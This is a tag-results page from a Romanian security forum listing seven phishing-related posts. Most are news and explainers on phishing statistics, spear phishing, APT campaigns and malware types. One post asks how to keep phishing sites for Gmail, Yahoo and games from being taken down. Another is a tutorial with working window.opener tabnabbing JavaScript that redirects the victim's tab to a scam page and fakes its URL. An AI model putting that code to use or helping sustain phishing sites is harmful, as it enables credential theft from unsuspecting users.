Jump to content

Search the Community

Showing results for tags 'phishing'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 7 results

  1. [ * ] For practice I will give you a tutorial to understand better: // Removed - scam page
  2. Scammers use phishing emails to get consumers to click on links to websites they've created solely for the purpose of information theft. They trick users into typing their names, addresses, login IDs, passwords or credit card information into fields on sites that look like they belong to real companies. In some cases, just clicking the link provided in an email will automatically drop malware onto the user's device. Once the malware is installed, hackers can easily steal the victim's information without their knowledge. Phishers are getting better and better at making their traps look real, copying logos and creating sham urls and email addresses that look like actual corporate credentials. The Intel quiz displayed 10 real emails delivered to inboxes and collected by analysts at McAfee Labs, which is part of Intel Security. Some were legitimate correspondences from major companies, while others were phishing emails that look extremely believable. Of the 19,458 people who took the quiz, the vast majority -- 80 percent -- fell for at least one of the fake phishing emails they saw. Only 3 percent got a perfect score. Interestingly, the one email that was most often misidentified in the quiz was actually a legitimate letter. It raised false alarm bells by encouraging readers to claim free ads, a clicky turn of phrase that made people wary. Compared to the other 143 countries represented in the survey, the U.S. ranked 27th overall in ability to detect phishing. Americans' average 68 percent accuracy was just a few points above the global average. France, Sweden, Hungary, the Netherlands and Spain turned in the best performances. The results serve as yet another reminder to click with caution -- or not click at all. Intel Security's Gary Davis urged people to keep security software and browsers up to date to help weed out malicious sites and downloads, and to hover over links before clicking on them to make sure they point where they say they do. He also warned of obvious red flags, such as misspellings or bad grammar, that can help tip you off to a fraudulent correspondence. Want to see how you'd do on the quiz? You can try your hand at it above. If you don't score well, don't take it too hard. When Intel circulated an earlier version of it to Internet security professionals last year, 94 percent were fooled at least once. Source
  3. Introduction: Spear phishing attacks Spear phishing and its evolutions like the watering hole attack represent one of the most insidious attack techniques adopted by the majority of threat actors in cyber space. According to the experts at Trend Micro security firm, spear phishing is the attack method used in some 91 percent of cyber attacks. Differently from a common phishing attack, in the spear phishing attack scenario bad actors target a subset of people, usually the employees of an organization, members of an association or visitors of a particular website. The purpose of the attack is to collect personal information and other sensitive data that would be used later in further attacks against the victims. The attack vector is usually an email message that appears to come from a legitimate entity, that requests an action from the victims. There are numerous variants of spear phishing: some phishing emails include malicious links to websites controlled by attackers, while others include a malicious attachment that infects the victim’s system. In recent attacks operated by several APT groups, the malicious email sent to the victims encouraged users to read Word or PDF documents that were specifically crafted to exploit vulnerabilities in the web browser in order to compromise the host. Analyzing data related to the cyber attacks that occurred in the last five years, it is easy to deduct that spear phishing represents the easiest way for an attacker to compromise enterprises and organizations of any size. The “Operation Aurora” attack (2010), the hack (2011), the Target breach (2013), and the most recent Sony Entertainment (2014) and the cyber attacks operated by Operation Carbanak and the Syrian Electronic Army are just a few examples of offensives that relied on spear phishing as an infection method. The key to the success of a spear phishing attack is that it relies on the weakest link of a security chain, humans. Another characteristic of a spear phishing attack is that the content shared with the victims of an attack is usually highly customized to the recipient to increase the chance of exploitation. Social engineering techniques entice users to click on malicious attachments and links by suggesting they may be topics of interest for the victims. Spear phishing and terrorism Terrorism is defined as violent conduct or the threat of violent acts conducted with the purpose to create a climate of terror and damage the critical operations of a nation. We must consider that today’s society heavy relies on technologies, the majority of services that we access every day strongly depend on IT systems. This is particularly evident in some industries like defense, energy, telecommunications and banking. For this reason terrorism is enlarging its spectrum of action and is targeting IT services whose destruction can have the effects of an old style terrorist attack. Terrorists have several ways to use technology for their operations, and once again, the spear phishing methodology could help them to realize their plans. Let’s imagine together some attack scenarios and the way a spear phishing attack could help a terrorist to hit the collective. Terrorists can directly target the services compromising their operations. A number of services are based on sophisticated infrastructure managed by humans. By interrupting them, it is possible to create serious damage to the victims and to the population. Let’s imagine a cyber attack against a bank that will cause the interruption of the operations of a financial institution, or a cyber attack against telecommunication systems of a national carrier. Suddenly the users will have no opportunity to withdraw money from their bank accounts, or they will be isolated due to the interruption of the service of the telecommunications carrier; both events would create panic among the population. Again, let’s think to cyber attacks against the transmission of a broadcaster or an energy grid of a state. Also in this case, the impact on the public order could be dramatic. All the systems that could be targeted by the attacks mentioned rely on both an IT system and a human component, and human operators are the element that could be targeted by terrorists using spear phishing attacks that could give them the opportunity to infiltrate the computer systems and move laterally inside the systems of the service provider. Unfortunately, the attack scenarios described are feasible, and attacks with similar consequences on the final services have already occurred. In those cases, the threat actors were state-sponsored hackers and cyber criminals that mainly operated for cyber espionage and for profit, but in the case of a terrorist attack, the final goal is more dangerous: the destruction itself. Terrorists can run a spear phishing attack for information gathering Information gathering through a spear phishing technique is the privileged choice for a terrorist. Cells of terrorists could use this attack method to spread malware and hack into computers and mobile phones of persons of interest with the intent to collect information on their social network and related to the activities they are involved in. Spear phishing could allow terrorists to collect information on a specific target or to access information related to investigation on members of the group. Let’s imagine a spear phishing attack on personnel of a defense subcontractor that could give the terrorist precious information about security measures in place in a specific area that the terrorist cell intends to attack. Online scams to finance activities of cells Spear phishing attacks could be used by terrorists to finance small operations. The attacks can be carried out with the intent to conduct online frauds and the proceeds, albeit modest, may also finance the purchase of weapons and false documents in the criminal underground. The terrorists operate online purchases that enable cells to avoid controls exercised by the intelligence agencies in the area. Terrorists groups become more tech-savvy Terrorist groups like ISIS and Al Qaeda have become more tech-savvy, and among their members there are also security experts with a deep knowledge of hacking techniques, including social engineering and spear phishing. Spear phishing is the privileged technique to steal sensitive information from corporate or government entities that the terrorists plan to hit. Unfortunately, the skills necessary to hack SCADA systems of a critical infrastructure are less and less specialized, because on the Internet it is easy to find numerous exploits ready for use. Very often, it is sufficient to know the credentials of a VPN service used to access the SCADA system remotely in order to hack it. Terrorists are aware of this, and spear phishing attacks against the staff that manages the systems in the critical infrastructure would provide all the necessary information to attack the internal network structure and launch the exploit to hack the SCADA systems. Resuming, a spear phishing attack could give an attacker the information necessary to damage processes of a nuclear power plant, a water facility systems or a satellite systems. Another factor that incentivizes the use of spear phishing attacks by terrorists is that this kind of attack for information gathering could be conducted remotely without arousing suspicion. ISIS operates spear phishing attacks against a Syrian citizen media group The demonstration that the terrorist group of the Islamic State in Iraq and Syria (ISIS) is using spear phishing techniques against opponents was provided by Citizen’s Lab, which published a detailed report on a hacking campaign run by the members of the organization against the Syrian citizen media group known as Raqqah is being Slaughtered Silently (RSS). The hackers operating for ISIS run the spear phishing campaign to unmask the location of the militants of the RSS with the intent to kill them. The Syrian group RSS is an organization that in several cases has criticized the abuses made by ISIS members during the occupation of the city of Ar-Raqqah, located in northern Syria. “A growing number of reports suggest that ISIS is systematically targeting groups that document atrocities, or that communicate with Western media and aid organizations, sometimes under the pretext of finding ‘spies’.” ISIS members are persecuting local groups searching for alleged spies of Western governments. The spear phishing campaign run by the terrorists allowed the members of ISIS to serve a malware to infect the computers of the opponents and track them. The experts at Citizen’s Lab uncovered the spear phishing campaign managed to target the RSS members. “Though we are unable to conclusively attribute the attack to ISIS or its supporters, a link to ISIS is plausible,” Citizen’s Lab noted. “The malware used in the attack differs substantially from campaigns linked to the Syrian regime, and the attack is focused against a group that is an active target of ISIS forces.” The malicious emails contain a link to a decoy file, which is used by attackers to drop a custom spyware on the victim’s machine. “The unsolicited message below was sent to RSS at the end of November 2014 from a Gmail email address. The message was carefully worded, and contained references specific to the work and interests of RSS,” states the report. “The custom malware used in this attack infects a user who views the decoy “slideshow,” and beacons home with the IP address of the victim’s computer and details about his or her system each time the computer restarts.” The researchers at Citizen’s Lab have noticed that the malicious code served through the spear phishing campaign is different from the Remote Access Trojans used by the hackers backed by the Syrian Government. Figure 1 – Slideshow.zip file used by ISIS members in the spear phishing campaign One of the principal differences is related to the control infrastructure. The members of the ISIS used an email account to gather information from compromised machines. “Unlike Syrian regime-linked malware, it contains no Remote Access Trojan (RAT) functionality, suggesting it is intended for identifying and locating a target,” said CL. “Further, because the malware sends data captured by the malware to an email address, it does not require that the attackers maintain a command-and-control server online. This functionality would be especially useful to an adversary unsure of whether it can maintain uninterrupted Internet connectivity.” Western intelligence collected evidence of the presence of hackers among the members of ISIS. According to some experts, members of ISIS are already working to secure communications between ISIS members and supporting the group to spread propaganda messages avoiding detection. “In addition, ISIS has reportedly gained the support of at least one individual with some experience with social engineering and hacking: Junaid Hussain (aka TriCk), a former member of teamp0ison hacking team. While Mr. Hussain and associates have reportedly made threats against Western governments, it is possible that he or others working with ISIS have quietly supported an effort to identify the targeted organization, which is a highly visible thorn in the side of ISIS.” ISIS members are targeting many other individuals with spear phishing attacks – for example, it has been documented that it targeted Internet cafés in Syria and Iraq that are used by many hacktivits. “Reports about ISIS targeting Internet cafés have grown increasingly common, and in some cases reports point to the possible use of keyloggers as well as unspecified IP sniffers to track behavior in Internet cafes,” Citizen’s Lab reported. Citizen’s Lab seems to be confident of the involvement of a non state-actors in the attack, and ISIS is a plausible suspect. “After considering each possibility, we find strong but inconclusive circumstantial evidence to support a link to ISIS,” CL said. “Whether or not ISIS is responsible, this attack is likely the work of a non-regime threat actor who may be just beginning to field a still-rudimentary capability in the Syrian conflict. The entry costs for engaging in malware attacks in a conflict like the Syrian Civil War are low, and made lower by the fact that the rule of law is nonexistent for large parts of the country.” The Energy industry – A privileged target for a terrorist attack The energy industry is probably the sector more exposed to the risk of terrorist attacks, as energy grids, nuclear plants, and water facilities represent a privileged target for terrorists. Spear phishing attacks could allow terrorists hit systems in the critical infrastructure to destroy the operations or could allow bad actors to gather sensitive information to organize a terrorist attack. The spear phishing campaign could be run against the personnel of a targeted infrastructure to gather sensitive information on defense mechanisms in place and ways to breach them. The last report issued by the DHS’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), the ICS-CERT MONITOR report related to the period September 2014 – February 2015, revealed that the majority of the attacks involved entities in the Energy Sector followed by those in Critical Manufacturing. Figure 2 – ICS-CERT MONITOR report related to the period September 2014 – February 2015 Spear phishing attacks appear among the principal attack vectors adopted by threat actors, but it is important to highlight that the report doesn’t mention cyber terrorism among possible motivations for the attacks. The fact that spear phishing attacks are effective to compromise the systems in the energy sector should make us reflect on the potential effectiveness of the cyber threat if it is adopted by terrorist groups. In April 2014, security experts at Symantec discovered a cyber espionage campaign targeting energy companies around the world by infecting them with a new trojan dubbed Laziok. Also in this case, the attack chain starts with a spear phishing attack. The emails used by hackers come from the moneytrans[.]eu domain, which acts as an open relay Simple Mail Transfer Protocol (SMTP) server. The e-mails contain an attachment, typically in the form of an Excel file, that exploits a well-known Microsoft Windows vulnerability patched in 2012 and that was exploited by threat actors behind Red October and CloudAtlas campaigns. The experts confirmed that the bad actors who used Trojan.Laziok malware to target energy companies haven’t adopted a sophisticated hacking technique. The investigation demonstrated that they exploited an old vulnerability by using exploit kits easy to find in the underground market. This kind of operation could be potentially conducted by groups of terrorists that intend to collect information on the IT infrastructure adopted by an organization to compromise it and cause serious damages to the process of a refinery or a nuclear plant. Since now security experts have no evidence for the availability of zero-day exploits in the arsenal of terrorists, the spear phishing campaign run by groups linked to the ISIS or Al-Qaida are quite different from the attacks run by APT groups backed by governments. Unfortunately, it is impossible to exclude that in the future group of terrorists with significant financial resources will have access to the underground market of zero-day exploits and purchase them to conduct targeted campaigns aimed to cause destruction and the lost of human lives. Conclusion Spear phishing represents a serious threat for every industry, and the possibility that a group of terrorists will use this technique is concrete. To prevent spear phishing attacks, it is crucial to raise awareness of the mechanics behind these kind of offensives. By sharing the knowledge of the techniques and tactics of the threat actors, it is possible to reduce in a significant way the likelihood and impact of spear phishing campaigns. To prevent spear phishing attacks, it is necessary that everyone in an organization has a deep knowledge of the threat and defense mechanisms. The pillars for an effective defense against the spear phishing attacks are: Awareness of the cyber threat Implementation of effective email filtering Implementation of effective network monitoring Spear phishing attacks are still a primary choice for cyber criminals and intelligence agencies that intend to steal money and sensitive information, but the technique could be a dangerous weapon to start a cyber terrorism attack. In order to protect our society we must trigger a collective defense. As explained by many security experts, the government cannot prevent spear-phishing attacks against private firms, but a successful attack against private industrial systems can be used to harm the security of a nation and take innocent lives. For this reason, it is important to share information on ongoing spear-phishing attacks and track potentially dangerous threat actors, especially cyber terrorists. Homeland security and national defense need a collective effort! References ISIS operates spear phishing attacksSecurity Affairs Phishing: A Very Dangerous Cyber Threat - InfoSec Institute The US energy industry is constantly under cyber attacksSecurity Affairs Energy companies infected by newly Laziok trojan malwareSecurity Affairs ICS-CERT- Most critical infrastructure attacks involve APTsSecurity Affairs http://techcrunch.com/2015/03/27/spear-phishing-could-enable-cyberterrorism-attacks-against-the-u-s/ http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-spear-phishing-email-most-favored-apt-attack-bait.pdf https://citizenlab.org/2014/12/malware-attack-targeting-syrian-isis-critics/ Phishing: A Very Dangerous Cyber Threat - InfoSec Institute Source
  4. Salut, nu am inteles exact din regulament daca avem voie sa vorbim pe forum despre phishing dar ma risc sa intreb... Tot creez site-uri de phishing de o perioada yahoo,gmail, jocuri gen league of legends etc, dar imi sunt blocate imediat si inchise... daca fac site-uri cu host gratuit imi sunt oprite in maxim 3-4 ore Daca le cumpar cel mai bun host ma tine cu ele 2-3 zile, dar eu vreau sa nu mi le opreasca... Exista vreo protectie ceva, ceva in htacces, nustiu, vreo metoda sa nu mi le mai opreasca? Daca metoda voastra functioneaza, va platesc, lasati-mi un mesaj sau un id de ceva aici in coment-uri, sa discutam mai pe indelete...
  5. This week's headlines have been security heavy thanks to the influx of news coming from Kaspersky's Security Analyst Summit. We've seen Kaspersky report everything from a $1bn cyber bank heist operation, to potentially NSA-sponsored and Middle Eastern advanced persistent threats. Specifically we saw threat research papers on the Carbanak, Equation and Desert Falcons attack campaigns. Carbanak is a banking-focused cyber operation that is believed to have stolen $1bn from 100 banks in more than 30 regions using specialist attack tools. Equation is a dangerous hack campaign, believed to have stemmed from the US National Security Agency, that uses a selection of attack tools, including one that can infect the operating systems on hard drives. Desert Falcons is a Middle Eastern cyber mercenary group that is believed to have infected thousands of Windows and Android devices with over 100 different malware variants. Each of these campaigns has its own specific implications for security professionals and the industry in general, but there is one unifying factor for me that is the most interesting: all three used phishing as a primary infection tactic. Phishing, for those who don't know, is an attack that aims to spread malware using infected messages that often masquerade as stemming from a trustworthy source. The message system used in phishing campaigns can include everything from Facebook posts and instant messages, to tweets and basic email. The campaigns are sometimes fairly basic and easy to see through, such as the Nigerian prince emails that circulate offering incredible sums of money in return for bank details, while others can include a social engineering element and are made to look like invoices or corporate communications. The attack strategy may sound simple enough to stop, but for me the trio of threats highlighted by Kaspersky show that most businesses still haven't addressed the phishing threat. There are likely to be several reasons why phishing still works so well. One of the most common that I hear from talking to industry professionals is that many businesses still assume that security is an out-of-the-box technological issue, not a cultural one. Despite constant warnings from security providers and government departments, many companies still assume that, if they have basic perimeter defences in place, they have ticked the security box and don't have to worry about cyber attacks, such as phishing. Sadly, this simply isn't the case. The Carbanak campaign is a particularly good example. Carbanak initially targets victims with spear phishing emails designed to look like legitimate banking communications. The messages contain malicious Microsoft Word and Control Panel Applet attachments that exploit flaws in Microsoft Office 2003, 2007 and 2010 (CVE-2012-0158 and CVE-2013-3906) and Microsoft Word (CVE-2014-1761) to execute the Carbanak backdoor. The initial infection didn't get the hackers access to the more secure internal systems they wanted to breach, but it did get them far enough into the network to begin a reconnaissance phase targeting bank employees, particularly systems administrators. From here, using information stolen during the reconnaissance phase, the attackers were able to get to the companies' crown jewels and steal vast sums of money. The key takeaway here is that firms need to back up their defence technology with robust cyber security awareness, using education programmes that not only teach staff how to spot and avoid falling victim to phishing messages, but how to report incidents to the IT team. Incidents will, of course, still occur; some of the social engineering behind phishing is seriously impressive and can lead to very realistic looking communications. But it would help dramatically to reduce the hackers' win rates and profit margins, a development I think everyone on the right side of the law would regard as positive. Hopefully, while bad, the discovery of Carbanak, Equation and Desert Falcons will at the very least make some firms aware of this. Although, considering my past experience covering the fallout of these attack campaigns, I'm not holding my breath. Source
  6. Sper s? nu gre?esc dac? voi spune, c? ?tim cu to?ii ce e un link ?i la ce folose?te atributul target pentru tag-ul <a>. ?i dat fiind faptul c? majoritatea consider? inofensiv? folosirea acestei tehnici atât de populare, în acest tutorial voi încerca s? demonstrez contrariul. Pentru început vreau s? men?ionez c? ceea ce va fi descris aici, personal o consider a fiind o vulnerabilitate pentru toate browserele cu excep?ia... ta-da! — Internet Explorer. Iat? de ce în continuare voi folosi cuvântul „vulnerabilitate” atunci când m? voi referi la acest „fenomen”. De asemenea, v? rog s? atrage?i aten?ia c? aceast? vulnerabilitate v-a func?iona perfect doar dac? se va ap?sa click de stânga pe link, ?i nu click de dreapta ? „Deschide în fil? nou?”. ?i, nu în ultimul rând, a?a cum toat? lumea recomand? s? fie folosit target="_blank" pentru toate link-urile externe (doar nu dorim ca utilizatorul s? p?r?seasc? pagina noastr?), trebuie s? constat c? aceast? vulnerabilitate afecteaz? majoritatea site-urilor care fac referire la pagini externe. Teorie Dac? avem pagina curent? „A” ?i facem referire la pagina „B” folosind atributul target="_blank", atunci când se va deschide pagina „B” pentru aceasta va fi creat un obiect window.opener cu ajutorului c?ruia putem redirec?iona pagina „A” c?tre o nou? pagin? în timp ce utilizatorul acceseaz? pagina „B”. ?i cel mai important, paginile „A” ?i „B” pot fi pe domenii diferite. Practic? Pentru a în?elege mai bine despre ce merge vorba, v? recomand urm?torul exemplu: ap?sa?i click aici, a?tepta?i s? se încarce pagina, dup? care reveni?i înapoi. Dac? apare eroarea „window.opener is null” atunci: Ai deschis link-ul altfel decât folosind click de stânga; Browserul t?u nu e vulnerabil; Magie neagr?? Pentru un exemplu mai complex, v? rog s? accesa?i aceast? pagin? unde am folosit aceast? vulnerabilitate pentru a simula un atac de tip phishing asupra unui site ce ofer? servicii de email. Ca ?i pentru oricare site asem?n?tor (Gmail, Hotmail ?.a.) fiecare link primit într-un mesaj are atributul target="_blank". Explica?ii Pentru a exploata vulnerabilitatea, trimitem un mesaj ce con?ine adresa URL c?tre pagina „capcan?”, unde pentru a fi siguri c? utilizatorul a deschis link-ul, folosind click de stânga ?i nu alt? metod?, verific?m dac? exist? obiectul window.opener ?i nu este NULL. Dup? care, putem redirec?iona pagina de unde a venit utilizatorul. Codul arat? cam a?a: if (window.opener) { window.opener.location.replace('full-url-to-scam-page'); } Dup? cum pute?i observa, totul e atât de simplu, atât de banal, atât de periculos... Dac? pagina de phishing ?i cea legitim? arat? ca 2 pic?turi de ap?, iar numele domeniului nu d? de b?nuit, când utilizatorul va reveni la pagina ini?ial? cu siguran??, nu va observa modificarea. Pentru a da mai pu?in de b?nuit, poate fi modificat? adresa URL pentru pagina de phishing în felul urm?tor: De pe pagina funny.php e nevoie s? trimitem adresa URL (referrer) de unde a venit utilizatorul. Eu am f?cut a?a: var referrer = encodeURIComponent(document.referrer); window.opener.location = 'http://black.securrity.com/t_blank/scam.php#' + referrer; Apoi, pe pagina scam.php am folosit urm?torul cod: // Extragem leg?tura adresei URL ?i elimin?m numele domeniului var fakeurl = decodeURIComponent(window.location.hash).replace('#http://white.securrity.com', ''); // Modific?m adresa URL f?r? a înc?rca con?inutul acelei pagini window.history.pushState(false, false, fake_url); În loc de concluzii Sincer, nu în?eleg, ce a fost în capul dezvoltatorilor ca s? permit? executarea func?iei location.replace() sau modificarea obiectului location dintre dou? domenii diferite? Dac? era de pe acela?i domeniu, în?elegeam... ?i chiar e foarte straniu, c?ci celelalte func?ii ?i atribute ale obiectului window.opener nu pot nici m?car citite, deoarece:
  7. Definirea conceptelor adware, spyware si grayware Adware-ul, spyware-ul si grayware-ul sunt in general instalate intr-un calculator fara cunostinta utilizatorului. Aceste programe colecteaza informatii stocate in calculator, schimba configuratia calculatorului, deschid ferestre suplimentare pe calculator fara consimtamantul utilizatorului. Adware-ul este un software ce afiseaza publicitate pe calculatorul dumneavoastra. Adware-ul este in general distribuit cu programele descarcate de pe Internet. Cel mai adesea, adware-ul este afisat intr-o fereastra pop-up. Ferestrele pop-up cu adware sunt uneori dificil de controlat si deschid ferestre noi mai repede decat utilizatorul le poate inchide. Grayware-ul sau malware-ul este un fisier sau un program, altul decat un virus, care este potential daunator. Multe atacuri grayware sunt atacuri de tip phishing ce incearca sa convinga cititorul sa ofere atacatorului acces la informatii personale fara ca acesta sa stie. Pe masura ce completati un formular online, datele sunt trimise la atacator. Grayware-ul poate fi inlaturat folosind unelte de inlaturare spyware si adware. Spyware-ul, un tip de grayware, este similar cu adware-ul. Acesta este distribuit fara interventia si cunostinta utilizatorului. Odata instalat, spyware-ul monitorizeaza activitatea calculatorului. Spyware-ul transmite apoi aceasta informatie organizatiei responsabile de lansarea spyware-ului. Phishing-ul este o forma de inginerie sociala unde atacatorul pretinde sa reprezinte o organizatie externa legitima, ca de exemplu o banca. O potentiala victima este contactata prin e-mail. Atacatorul este posibil sa ceara sa verifice informatii, ca de exemplu parola sau username-ul, pentru a preveni presupuse consecinte teribile ce pot aparea. Explicarea atacului de tip Denial of Service Denial of Service (DoS) este o forma de atac care interzice utilizatorilor sa acceseze servicii standard precum un server de e-mail sau web, pentru ca sistemul este ocupat sa raspunda unui numar anormal de mare de cereri. DoS functioneaza prin trimiterea unui numar suficient de mare de cereri astfel incat serviciul cautat sa devina supraincarcat si sa cedeze. Atacurile tipice de tip DoS includ: Ping al mortii – O serie de ping-uri repetate mai mari decat cele normale care vor face sa cedeze calculatorul receptor. E-mail-ul bomba – O cantitate mare de mail bulk este transmisa asfel incat sa suprasolicite serverul de mail si sa impiedice utilizatorii normali sa acceseze serverul. DoS distribuit (DDoS) este o alta forma care foloseste mai multe calculatoare, numite zombi. Cu DDoS, intentia este sa se obstructioneze sau sa se suprasolicite accesul la serverul tinta. Calculatoarele de tip zombi aflate in diverse zone geografice fac dificila descoperirea originii atacului.
×
×
  • Create New...